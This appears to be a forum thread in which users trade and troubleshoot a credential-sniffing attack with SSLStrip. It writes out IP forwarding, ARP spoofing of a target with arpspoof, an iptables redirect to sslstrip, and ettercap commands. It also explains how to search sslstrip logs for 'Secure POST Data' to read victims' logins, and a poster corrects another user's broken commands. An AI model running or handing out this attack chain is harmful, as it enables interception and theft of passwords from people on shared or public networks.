Sickness - Password Sniffing with SSLStrip.

[sickness]

doing this will write out a log file as well as show in "real time" every time someone logs in a website thats HTTPS or has forms with user/password/email etc..

2nd command will filter out the specific logins. (most/all sites will have either a form with email or pass in it)

Yea that's a nice method to ease your work

[Eatme]

thanks sir..

Also another way of doing it (which I think is BEST)

sslstrip -a -k -f -l 8080

kate sslstrip.log

Ctrl+F (find)
Ctrl+v (past) "Secure POST Data"

and you will see the following (Ex: login.yahoo.com) login details within the next line.

F3 will guide you through all of your logins by order of entry.

Hope this helps anyone who is having trouble filtering out all the bs in the logs...

[krillerill]

great tutorial,, althou im wondering, what command in here, is it that gives no warning?
and how do you know what to grep for? and when to do it?

also with this i noticed you did not sign into yahoo mail, is it becouse account did not exist? im guessing that anyway :P
i kinda lol'd when i saw "w00t no warning" then "wrong account info" in other window ^^

[sickness]

great tutorial,, althou im wondering, what command in here, is it that gives no warning?
and how do you know what to grep for? and when to do it?

also with this i noticed you did not sign into yahoo mail, is it becouse account did not exist? im guessing that anyway :P
i kinda lol'd when i saw "w00t no warning" then "wrong account info" in other window ^^

Well it was not a valid yahoo account, but if it were valid it would have signed in. The questions about what to grep for have been answered by Eatme pretty much and the question about when to do it, really depends on when the victim logs in

[vindal]

Hi,

I successfully ran sslstrip within my own network against my second laptop, and it worked perfectly. However, subsequent attempts against that laptop are not working. For one thing, when I check the MAC address on the victim machine (arp -a) I am not getting the same results as I did on the first attempt. Also, the log file I am keeping on the attacker machine is empty. Most importantly, when I went to gmail (on subsequent attempts) I got https instead of http.

Here are the commands I used on the first (and subsequent attempts):

cd sslstrip-0.7
echo 1 > /proc/sys/net/ipv4/ip-forward

arpspoof -1 wlan0 -t 192.168.5 192.168.2.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

python sslstrip.py -w logfile

Running backtrack 4

I am wondering whether there are any specific commands I should have run after the first attempt to terminate/kill some of these processes, keeping in mind that after the first successful attempt I completely shut down the attacker machine and put the victim machine into sleep mode before attempting subsequent attempts (and I rebooted the wireless router).

Any ideas welcome

Thanks
Vindal

[sickness]

Ok so first of all, check that you have no firewall on.
Second I would suggest you do this using ettercap too like this:

Your command looks like this:
[CODE]echo 1 > /proc/sys/net/ipv4/ip-forward[/CODE
When it should look like this:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

Next:

Code:

arpspoof -i wlan0 -t target gateway (not arpspoof -1)
sslstrip -a -f -k

If you also want ettercap here, you edit /etc/etter.conf and then type

Code:

 ettercap -T -q -i wlan0